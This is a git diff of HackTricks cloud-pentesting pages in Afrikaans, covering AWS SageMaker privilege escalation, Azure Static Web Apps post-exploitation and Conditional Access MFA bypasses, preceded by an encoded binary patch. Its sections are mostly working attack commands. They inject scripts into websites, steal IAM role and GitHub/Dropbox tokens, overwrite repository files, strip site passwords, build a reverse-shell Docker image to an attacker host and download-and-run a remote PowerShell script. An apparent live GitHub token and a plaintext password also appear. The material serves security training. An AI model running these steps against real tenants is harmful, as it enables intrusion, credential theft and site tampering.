zZh|g@VCOtx`7*vb&^BI4hK#5w3UuNA%JUwb!>E2)qW;%QT`s|~Gvwi0#0r73*Nqpw
zpETFMX-3!)xNu9asKX;%*Hz>eo&KT1)g1Y@-O&T~ZVw{`&+i~@U1+B?-@Ev|yYt9<
zVvA~kq&x_|eglPZ;3r)seFB|)vOMp~*I&y5U|&a4=lePsn))MQ&!Cg~S^-k$4Uy;+
znq)9lx^0c@)zXghd*cO-%QqV+KJ4-WYE!mNH1R{AL-(lGi>6TR`&!FVFoM)lxFfrv
z6*(q}3L_?FNrIhA8jf<JB9DZxvd)!=E$S#UOke^YerDmF0iRJo9nZihW1Z7f#wKk<
z?U^$*M55Z|uDp)p5oxN#Rc-B;PctG7pT2n<#3`Jd6b0E&wCpkDWN!6VQBB{0KN$ge
zE4bsTGv;UN)R=|irxec(_E#PQxi{C9N|R^P$|fu2^&dZEXs#5d`M1A6<J~jVGx&Iw
z<tin^I}_^Cv|?q$e}W%3Gg{_!;Owhgm${UCd%$+cch@ZXP^%cVRM5v@{^(YOc5PmM
zgKQGc&^_7|UEf*AX_ECzD(j(LtJC*f_;=Qq8nbM|U-Fw*j^gAY2Y<>v-Rv);C;v2(
zsDIqO828RQsqj2O^El4IsF6M*tmkRCPU37);Tf~Em!FO;@-Q-GVwNYbr)o+@=)RK8
zDMXG0?GqGlY2ENMlZfDI93||V3}1=fu<B6hgR#R$w<_xQO^?U-Mit=>+z4DK&`c_*
zikq<sma0b0VcZhR^sufM<z2ZMBXtdR$5QH8zHVBKB6c~+_=QK~`NL_2bxg;I*cQ_9
zJ{sq4kxR5^xkQRUPo-F%ZYI_WBsDq>)^ONLVQi0l#^+BTCVECd+CVg!Q<KZOu1FO<
zyjy0(NPk&Hv+>UJ<+3cWS_uRwYnstJo-d-sE3GDwKeINDf-j*r#4~V#9sbF{s^T1n
z&MRww<mpk7cIQP8y1k`J{RF39jlLrI_!|XJ5f%-aFu(RGj@iTLs_Dy{9W^Jud&Qw*
zwV-~X+bb%PJ?nA(FqvyT7cgaX@g~Ow*o0rl;wvoF50{g(qvzX7yz3`R=l?^@PdUXV
zKjVws6W+4;4#e<<j}x4mPY7?E2dTCxuWZInMj>n8TRPXq-ke1?M-zFCq^ns);aHRT
ztts3<1&8enR_R^(L|4i0MtjUx?2eJsg?GO7FMR~_>HNj9{NlR-VHUD+v37j^Zts+u
z4E>eIOsGWSd8Jd?oEee*jQ1bkaX))Z52^NM+Eh=JJ@Xl0UQ+|{c+Anb^cg5}0N+m-
zLJD7b{!YWGEC3?2xBFC{7kEvcWU+BupP}nk0ub+nhoVZJ@#nxBK$eRB)AP3+2Iv4Z
z>Xl5SEdO^2H#QEC{fj4_w8p*%Fz_`KZ&BJ`R6|Y$$VTRXqn^*Q0sow8+WymEX+ZXs
z*u+0NTo`ci_V=Y!t7qsM3CMB;<ncbAc|93#-pD@l+_YDKtSOw7-G3VT|Gr249}%&r
XJyA_R55_!w3rto@L9#;JAmG0MlXNbQ

literal 0
HcmV?d00001

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 27aff692c..0644e21d0 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -12,7 +12,7 @@ aws sagemaker create-notebook-instance --notebook-instance-name example \
 --instance-type ml.t2.medium \
 --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
 ```
-Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang te verkry tot die notaboekinstansie sodra dit gereed is:
+Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang tot die notaboekinstansie te verkry sodra dit gereed is:
 ```bash
 aws sagemaker create-presigned-notebook-instance-url \
 --notebook-instance-name <name>
@@ -25,7 +25,7 @@ Nou is dit moontlik om toegang te verkry tot die metadata geloofsbriewe van die
 
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
 
-As daar Jupyter **notebooks reeds aan die gang is** daarop en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**.
+As daar Jupyter **notebooks reeds aan die gang is** en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**.
 ```bash
 aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
 ```
@@ -33,7 +33,7 @@ aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <n
 
 ### `sagemaker:CreateProcessingJob,iam:PassRole`
 
-'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instance** uitgevoer sal word, en **die geloofsbriewe van die IAM rol wat aangeheg is, steel**.
+'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** laat uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instansie** uitgevoer sal word, en **die geloofsbriewe van die aangehegte IAM rol steel**.
 ```bash
 # I uploaded a python docker image to the ECR
 aws sagemaker create-processing-job \
@@ -52,13 +52,13 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the c
 'n Aanvaller met daardie toestemmings sal in staat wees om 'n opleidingswerk te skep, **wat 'n arbitrêre houer** daarop laat loop met 'n **rol wat daaraan geheg is**. Daarom sal die aanvaller in staat wees om die akrediteer van die rol te steel.
 
 > [!WARNING]
-> Hierdie scenario is moeiliker om te benut as die vorige een omdat jy 'n Docker beeld moet genereer wat die rev shell of krediete direk na die aanvaller sal stuur (jy kan nie 'n beginopdrag in die konfigurasie van die opleidingswerk aandui nie).
+> Hierdie scenario is moeiliker om te benut as die vorige een omdat jy 'n Docker-beeld moet genereer wat die rev shell of krediete direk na die aanvaller sal stuur (jy kan nie 'n beginopdrag in die konfigurasie van die opleidingswerk aandui nie).
 >
 > ```bash
 > # Skep docker beeld
 > mkdir /tmp/rev
 > ## Let daarop dat die opleidingswerk 'n uitvoerbare genaamd "train" gaan aanroep
-> ## Daarom plaas ek die rev shell in /bin/train
+> ## Dit is waarom ek die rev shell in /bin/train plaas
 > ## Stel die waardes van <YOUR-IP-OR-DOMAIN> en <YOUR-PORT>
 > cat > /tmp/rev/Dockerfile <<EOF
 > FROM ubuntu
@@ -94,8 +94,8 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **wat 'n arbitrêre houer** daarop laat loop met 'n **rol aangeheg** daaraan.\
-&#xNAN;_&#x49; het nie uitgebuit nie weens die gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._
+'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **'n arbitrêre houer** daarop te laat loop met 'n **rol aangeheg** daaraan.\
+_Ek het nie uitgebuit nie weens die gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._
 
 ## Verwysings
 
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
new file mode 100644
index 000000000..614961a37
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
@@ -0,0 +1,162 @@
+# Az - Statiese Web Apps Post Exploitatie
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Statiese Web Apps
+
+Vir meer inligting oor hierdie diens, kyk:
+
+{{#ref}}
+../az-services/az-static-web-apps.md
+{{#endref}}
+
+### Microsoft.Web/staticSites/snippets/write
+
+Dit is moontlik om 'n statiese webblad te laat laai arbitraire HTML-kode deur 'n snit te skep. Dit kan 'n aanvaller toelaat om JS-kode binne die webtoepassing in te voeg en sensitiewe inligting soos geloofsbriewe of mnemonic sleutels (in web3 beursies) te steel.
+
+Die volgende opdrag skep 'n snit wat altyd deur die webtoepassing gelaai sal word::
+```bash
+az rest \
+--method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"name": "supersnippet",
+"location": "Body",
+"applicableEnvironmentsMode": "AllEnvironments",
+"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
+"environments": [],
+"insertBottom": false
+}
+}'
+```
+### Lees Geconfigureerde Derdeparty Kredensiale
+
+Soos verduidelik in die App Service afdeling:
+
+{{#ref}}
+../az-privilege-escalation/az-app-services-privesc.md
+{{#endref}}
+
+Deur die volgende opdrag uit te voer, is dit moontlik om **die derdeparty kredensiale** wat in die huidige rekening geconfigureer is, te lees. Let daarop dat as daar byvoorbeeld sommige Github kredensiale in 'n ander gebruiker geconfigureer is, jy nie die token van 'n ander een sal kan bekom nie.
+```bash
+az rest --method GET \
+--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
+```
+Hierdie opdrag gee tokens terug vir Github, Bitbucket, Dropbox en OneDrive.
+
+Hier is 'n paar opdragvoorbeelde om die tokens te kontroleer:
+```bash
+# GitHub – List Repositories
+curl -H "Authorization: token <token>" \
+-H "Accept: application/vnd.github.v3+json" \
+https://api.github.com/user/repos
+
+# Bitbucket – List Repositories
+curl -H "Authorization: Bearer <token>" \
+-H "Accept: application/json" \
+https://api.bitbucket.org/2.0/repositories
+
+# Dropbox – List Files in Root Folder
+curl -X POST https://api.dropboxapi.com/2/files/list_folder \
+-H "Authorization: Bearer <token>" \
+-H "Content-Type: application/json" \
+--data '{"path": ""}'
+
+# OneDrive – List Files in Root Folder
+curl -H "Authorization: Bearer <token>" \
+-H "Accept: application/json" \
+https://graph.microsoft.com/v1.0/me/drive/root/children
+```
+### Oorskrywe lêer - Oorskrywe roetes, HTML, JS...
+
+Dit is moontlik om **'n lêer binne die Github repo** wat die app bevat, deur Azure te oorskrywe deur die **Github token** 'n versoek te stuur soos die volgende wat die pad van die lêer om te oorskrywe, die inhoud van die lêer en die verbintenisboodskap sal aandui.
+
+Dit kan deur aanvallers misbruik word om basies **die inhoud van die web app te verander** om kwaadwillige inhoud te dien (steel geloofsbriewe, mnemonic sleutels...) of net om **sekere pades** na hul eie bedieners te herlei deur die `staticwebapp.config.json` lêer te oorskrywe.
+
+> [!WARNING]
+> Let daarop dat as 'n aanvaller daarin slaag om die Github repo op enige manier te kompromitteer, hulle ook die lêer direk vanaf Github kan oorskrywe.
+```bash
+curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
+-H "Content-Type: application/json" \
+-d '{
+"commit": {
+"message": "Update static web app route configuration",
+"branchName": "main",
+"committer": {
+"name": "Azure App Service",
+"email": "donotreply@microsoft.com"
+},
+"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
+"filePath": "staticwebapp.config.json",
+"message": "Update static web app route configuration",
+"repoName": "carlospolop/my-first-static-web-app",
+"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
+},
+"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
+}'
+```
+### Microsoft.Web/staticSites/config/write
+
+Met hierdie toestemming is dit moontlik om die **wagwoord** wat 'n statiese webtoepassing beskerm, te **wysig** of selfs elke omgewing te ontprotect deur 'n versoek soos die volgende te stuur:
+```bash
+# Change password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+"name": "basicAuth",
+"type": "Microsoft.Web/staticSites/basicAuth",
+"properties": {
+"password": "SuperPassword123.",
+"secretUrl": "",
+"applicableEnvironmentsMode": "AllEnvironments"
+}
+}'
+
+# Remove the need of a password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+"name": "basicAuth",
+"type": "Microsoft.Web/staticSites/basicAuth",
+"properties": {
+"secretUrl": "",
+"applicableEnvironmentsMode": "SpecifiedEnvironments",
+"secretState": "None"
+}
+}'
+```
+### Microsoft.Web/staticSites/listSecrets/action
+
+Hierdie toestemming laat toe om die **API sleutel ontplooiingstoken** vir die statiese app te verkry.
+
+Hierdie token laat toe om die app te ontplooi.
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
+```
+Dan, om 'n app op te dateer, kan jy die volgende opdrag uitvoer. Let daarop dat hierdie opdrag verkry is deur te kyk **hoe Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) werk**, aangesien dit die een is wat Azure standaard ingestel het om te gebruik. So die beeld en betalings kan in die toekoms verander.
+
+1. Laai die repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) af (of enige ander repo wat jy wil ontplooi) en voer `cd react-basic` uit.
+2. Verander die kode wat jy wil ontplooi
+3. Ontplooi dit deur (Onthou om die `<api-token>` te verander):
+```bash
+docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
+```
+### Microsoft.Web/staticSites/write
+
+Met hierdie toestemming is dit moontlik om die **bron van die statiese webtoepassing na 'n ander Github-repo te verander**, egter, dit sal nie outomaties voorsien word nie, aangesien dit gewoonlik vanaf 'n Github-aksie gedoen moet word met die token wat die aksie gemagtig het, aangesien hierdie token nie outomaties binne die Github-geheime van die repo opgedateer word nie (dit word net outomaties bygevoeg wanneer die toepassing geskep word).
+```bash
+az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
+```
+### Microsoft.Web/staticSites/resetapikey/action
+
+Met hierdie toestemming is dit moontlik om die **API-sleutel van die statiese webtoepassing te reset**, wat moontlik die werkvloei wat die toepassing outomaties ontplooi, kan DoS.
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
+```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
index 71138f238..6c8475787 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -9,42 +9,42 @@ Voorwaardelike toegang beleide **definieer** basies **Wie** kan toegang hê tot
 
 Hier is 'n paar voorbeelde:
 
-1. **Aanmeld Risiko Beleid**: Hierdie beleid kan ingestel word om multi-faktor verifikasie (MFA) te vereis wanneer 'n aanmeld risiko opgespoor word. Byvoorbeeld, as 'n gebruiker se aanmeldgedrag ongewoon is in vergelyking met hul gereelde patroon, soos om van 'n ander land aan te meld, kan die stelsel vra vir addisionele verifikasie.
+1. **Aanmeld Risiko Beleid**: Hierdie beleid kan ingestel word om multi-faktor verifikasie (MFA) te vereis wanneer 'n aanmeld risiko opgespoor word. Byvoorbeeld, as 'n gebruiker se aanmeldgedrag ongewoon is in vergelyking met hul gereelde patroon, soos om van 'n ander land aan te meld, kan die stelsel vra om addisionele verifikasie.
 2. **Toestel Nakoming Beleid**: Hierdie beleid kan toegang tot Azure-dienste beperk slegs tot toestelle wat voldoen aan die organisasie se sekuriteitsstandaarde. Byvoorbeeld, toegang kan slegs toegestaan word vanaf toestelle wat opdatering antivirus sagteware het of 'n sekere bedryfstelsel weergawe gebruik.
 
 ## Voorwaardelike Toegang Beleide Omseilings
 
-Dit is moontlik dat 'n voorwaardelike toegang beleid **sekere inligting nagaan wat maklik gemanipuleer kan word wat 'n omseiling van die beleid toelaat**. En as die beleid byvoorbeeld MFA geconfigureer het, sal die aanvaller in staat wees om dit te omseil.
+Dit is moontlik dat 'n voorwaardelike toegang beleid **sekere inligting nagaan wat maklik gemanipuleer kan word, wat 'n omseiling van die beleid moontlik maak**. En as die beleid byvoorbeeld MFA geconfigureer het, sal die aanvaller in staat wees om dit te omseil.
 
-Wanneer 'n voorwaardelike toegang beleid geconfigureer word, is dit nodig om die **gebruikers** wat geraak word en **teiken hulpbronne** (soos alle wolk toepassings) aan te dui.
+Wanneer 'n voorwaardelike toegang beleid geconfigureer word, is dit nodig om die **gebruikers** wat geraak word en **teikenhulpbronne** (soos alle wolk toepassings) aan te dui.
 
 Dit is ook nodig om die **voorwaardes** te configureer wat die beleid sal **aktiveer**:
 
 - **Netwerk**: IP, IP-reekse en geografiese liggings
-- Kan omseil word deur 'n VPN of Proxy te gebruik om met 'n land te verbind of deur te probeer aanmeld vanaf 'n toegelate IP-adres
+- Kan omseil word deur 'n VPN of Proxy te gebruik om met 'n land te verbind of te probeer om vanaf 'n toegelate IP-adres aan te meld
 - **Microsoft risiko's**: Gebruiker risiko, Aanmeld risiko, Insider risiko
 - **Toestel platforms**: Enige toestel of kies Android, iOS, Windows phone, Windows, macOS, Linux
-- As “Enige toestel” nie gekies is nie, maar al die ander opsies gekies is, is dit moontlik om dit te omseil deur 'n ewekansige gebruiker-agent te gebruik wat nie met daardie platforms verband hou nie
-- **Kliënt toepassings**: Opsies is “Blaaier”, “Mobiele toepassings en desktop kliënte”, “Exchange ActiveSync kliënte” en Ander kliënte”
+- As “Enige toestel” nie gekies is nie, maar al die ander opsies gekies is, is dit moontlik om dit te omseil deur 'n ewekansige gebruikersagent te gebruik wat nie met daardie platforms verband hou nie
+- **Kliënt toepassings**: Opsies is “Blaaier”, “Mobiele toepassings en desktop kliënte”, “Exchange ActiveSync kliënte” en “Ander kliënte”
 - Om aanmelding te omseil met 'n nie-geselecteerde opsie
 - **Filter vir toestelle**: Dit is moontlik om 'n reël te genereer wat verband hou met die gebruikte toestel
 - **Verifikasie vloei**: Opsies is “Toestel kode vloei” en “Verifikasie oordrag”
-- Dit sal nie 'n aanvaller beïnvloed nie tensy hy probeer om enige van daardie protokolle in 'n phishing poging te misbruik om toegang tot die slagoffer se rekening te verkry
+- Dit sal nie 'n aanvaller beïnvloed nie, tensy hy probeer om enige van daardie protokolle in 'n phishing poging te misbruik om toegang tot die slagoffer se rekening te verkry
 
-Die moontlike **resultate** is: Blokkeer of Gee toegang met potensiële voorwaardes soos vereis MFA, toestel moet nakom…
+Die moontlike **resultate** is: Blokkeer of Gee toegang met potensiële voorwaardes soos vereis MFA, toestel moet nakom...
 
 ### Toestel Platforms - Toestel Voorwaarde
 
-Dit is moontlik om 'n voorwaarde in te stel gebaseer op die **toestel platform** (Android, iOS, Windows, macOS...), egter, dit is gebaseer op die **gebruiker-agent** so dit is maklik om te omseil. Selfs **om al die opsies MFA af te dwing**, as jy 'n **gebruiker-agent gebruik wat nie erken word nie,** sal jy in staat wees om die MFA of blokkeer te omseil:
+Dit is moontlik om 'n voorwaarde in te stel gebaseer op die **toestelplatform** (Android, iOS, Windows, macOS...), egter, dit is gebaseer op die **gebruikersagent** so dit is maklik om te omseil. Selfs **om al die opsies MFA af te dwing**, as jy 'n **gebruikersagent gebruik wat nie erken word nie,** sal jy in staat wees om die MFA of blokkeer te omseil:
 
 <figure><img src="../../../../images/image (352).png" alt=""><figcaption></figcaption></figure>
 
-Net om die blaaier **'n onbekende gebruiker-agent te laat stuur** (soos `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is genoeg om hierdie voorwaarde nie te aktiveer nie.\
-Jy kan die gebruiker-agent **handmatig** in die ontwikkelaar gereedskap verander:
+Net om die blaaier **'n onbekende gebruikersagent te laat stuur** (soos `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is genoeg om hierdie voorwaarde nie te aktiveer nie.\
+Jy kan die gebruikersagent **handmatig** in die ontwikkelaar gereedskap verander:
 
 <figure><img src="../../../../images/image (351).png" alt="" width="375"><figcaption></figcaption></figure>
 
-&#x20;Of gebruik 'n [blaaier uitbreiding soos hierdie een](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
+Of gebruik 'n [blaaier uitbreiding soos hierdie een](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
 
 ### Ligging: Lande, IP-reekse - Toestel Voorwaarde
 
@@ -57,9 +57,9 @@ Dit is moontlik om **voorwaardelike toegang beleide te configureer om te blokkee
 <figure><img src="../../../../images/image (353).png" alt=""><figcaption></figcaption></figure>
 
 Om te probeer om hierdie beskerming te omseil, moet jy kyk of jy **slegs in enige toepassing** kan aanmeld.\
-Die hulpmiddel [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) het **tens van toepassings-ID's hardcoded** en sal probeer om in hulle aan te meld en jou laat weet en selfs die token gee as dit suksesvol is.
+Die hulpmiddel [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) het **tens of toepassings-ID's hardcoded** en sal probeer om in hulle aan te meld en jou laat weet en selfs die token gee as dit suksesvol is.
 
-Om **spesifieke toepassings-ID's in spesifieke hulpbronne te toets**, kan jy ook 'n hulpmiddel soos gebruik:
+Om **spesifieke toepassings-ID's in spesifieke hulpbronne te toets**, kan jy ook 'n hulpmiddel soos:
 ```bash
 roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout
 
@@ -75,7 +75,7 @@ Die hulpmiddel [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kan ook gebru
 
 ### Ringtone
 
-Een Azure MFA opsie is om **'n oproep te ontvang op die geconfigureerde telefoonnommer** waar die gebruiker gevra sal word om die karakter `#` te **stuur**.
+Een Azure MFA opsie is om **'n oproep in die geconfigureerde telefoonnommer te ontvang** waar die gebruiker gevra sal word om die karakter `#` te **stuur**.
 
 > [!CAUTION]
 > Aangesien karakters net **tones** is, kan 'n aanvaller die **voicemail** boodskap van die telefoonnommer **kompromitteer**, die boodskap as die **toon van `#`** konfigureer en dan, wanneer die MFA aangevra word, seker maak dat die **slagoffer se telefoon besig is** (dit bel) sodat die Azure oproep na die voicemail omgelei word.
@@ -104,9 +104,9 @@ Vind meer inligting oor hierdie tipe aanval op die volgende bladsy:
 
 ### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep)
 
-Hierdie skrip verkry 'n paar gebruikersakkrediteer en kyk of dit kan aanmeld in 'n paar toepassings.
+Hierdie skrip verkry 'n paar gebruikersakkrediteer en kyk of dit kan aanmeld in sommige toepassings.
 
-Dit is nuttig om te sien of jy **nie MFA benodig om aan te meld in 'n paar toepassings nie** wat jy later mag misbruik om **privilegies te verhoog**.
+Dit is nuttig om te sien of jy **nie MFA benodig om aan te meld in sommige toepassings nie** wat jy later mag misbruik om **privilegies te verhoog**.
 
 ### [roadrecon](https://github.com/dirkjanm/ROADtools)
 
@@ -116,7 +116,7 @@ roadrecon plugin policies
 ```
 ### [Invoke-MFASweep](https://github.com/dafthack/MFASweep)
 
-MFASweep is 'n PowerShell-skrip wat probeer om **in te log op verskeie Microsoft-dienste met 'n verskafde stel geloofsbriewe en sal probeer om te identifiseer of MFA geaktiveer is**. Afhangende van hoe voorwaardelike toegangbeleide en ander multi-faktor verifikasie-instellings geconfigureer is, kan sommige protokolle eindig as 'n enkele faktor. Dit het ook 'n addisionele kontrole vir ADFS-konfigurasies en kan probeer om in te log op die plaaslike ADFS-bediener indien opgespoor.
+MFASweep is 'n PowerShell-skrip wat probeer om **in te log op verskeie Microsoft-dienste met 'n verskafde stel geloofsbriewe en sal probeer om te identifiseer of MFA geaktiveer is**. Afhangende van hoe voorwaardelike toegangbeleide en ander multi-faktor verifikasie-instellings geconfigureer is, kan sommige protokolle eindig as enkel-faktor. Dit het ook 'n addisionele kontrole vir ADFS-konfigurasies en kan probeer om in te log op die on-prem ADFS-bediener indien opgespoor.
 ```bash
 Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content
 Invoke-MFASweep -Username <username> -Password <pass>
@@ -126,7 +126,7 @@ Invoke-MFASweep -Username <username> -Password <pass>
 Hierdie hulpmiddel het gehelp om MFA-omseilings te identifiseer en dan API's in verskeie produksie AAD-huurders te misbruik, waar AAD-klante geglo het dat hulle MFA afgedwing het, maar ROPC-gebaseerde outentisering suksesvol was.
 
 > [!TIP]
-> Jy moet toestemming hê om al die toepassings te lys om die lys van die toepassings te genereer wat gebruteforce kan word.
+> Jy moet toestemming hê om al die toepassings te lys om die lys van die toepassings te genereer om te brute-force.
 ```bash
 ./ropci configure
 ./ropci apps list --all --format json -o apps.json
@@ -135,25 +135,25 @@ Hierdie hulpmiddel het gehelp om MFA-omseilings te identifiseer en dan API's in
 ```
 ### [donkeytoken](https://github.com/silverhack/donkeytoken)
 
-Donkey token is 'n stel funksies wat daarop gemik is om sekuriteitskonsultante te help wat die Validiteit van Voorwaardelike Toegang Beleide moet toets, toetse vir 2FA-geaktiveerde Microsoft-portale, ens.
+Donkey token is 'n stel funksies wat daarop gemik is om sekuriteitskonsultante te help wat Conditional Access Policies moet valideer, toetse vir 2FA-geaktiveerde Microsoft-portale, ens.
 
 <pre class="language-powershell"><code class="lang-powershell"><strong>git clone https://github.com/silverhack/donkeytoken.git
 </strong><strong>Import-Module '.\donkeytoken' -Force
 </strong></code></pre>
 
-**Toets elke portaal** of dit moontlik is om **sonder MFA aan te meld**:
+**Toets elke portaal** of dit moontlik is om te **log in sonder MFA**:
 ```powershell
 $username = "conditional-access-app-user@azure.training.hacktricks.xyz"
 $password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential($username, $password)
 Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
 ```
-Omdat die **Azure** **portaal** **nie beperk** is nie, is dit moontlik om 'n **token van die portaal eindpunt te versamel om toegang te verkry tot enige diens wat deur die vorige uitvoering opgespoor is**. In hierdie geval is Sharepoint geïdentifiseer, en 'n token om toegang daartoe te verkry, word aangevra:
+Omdat die **Azure** **portaal** **nie beperk nie**, is dit moontlik om 'n **token van die portaal-eindpunt te versamel om toegang te verkry tot enige diens wat deur die vorige uitvoering opgespoor is**. In hierdie geval is Sharepoint geïdentifiseer, en 'n token om toegang daartoe te verkry, word aangevra:
 ```powershell
 $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
 Read-JWTtoken -token $token.access_token
 ```
-As jy aanvaar dat die token die toestemming Sites.Read.All (van Sharepoint) het, selfs al kan jy nie Sharepoint vanaf die web toegang nie weens MFA, is dit moontlik om die token te gebruik om toegang tot die lêers met die gegenereerde token te verkry:
+As jy aanvaar dat die token die toestemming Sites.Read.All (van Sharepoint) het, selfs al kan jy nie Sharepoint vanaf die web toegang nie weens MFA, is dit moontlik om die token te gebruik om toegang tot die lêers te verkry met die gegenereerde token:
 ```powershell
